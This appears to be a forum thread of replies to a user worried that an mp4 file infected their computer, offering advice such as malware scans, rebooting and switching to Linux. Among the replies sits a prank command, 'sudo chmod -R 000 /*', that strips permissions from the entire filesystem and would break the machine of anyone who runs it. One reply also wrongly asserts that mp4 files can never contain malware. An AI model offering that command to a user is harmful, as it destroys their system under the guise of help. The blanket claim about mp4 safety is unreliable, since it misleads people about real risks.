calm down. mp4 files cannot be opened as executables unless you specify they should. Therefore they cannot contain a virus. What file was it, and what happened exactly when you opened it (I assume you simply double clicked am I right?)?

Whatever the case may be, there's a universal solution: http://www.linuxmint.com/download.php

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

what do you mean you don't know? where did that file come from? did it just appear on your hard drive? why did you open an unknown file?

either way try installing malwarebytes and running a full scan.

Ask your friend where he got that file, and if it had any weird effect on his pc. Was this by mail?

(dumb question, but did you try a reboot?)
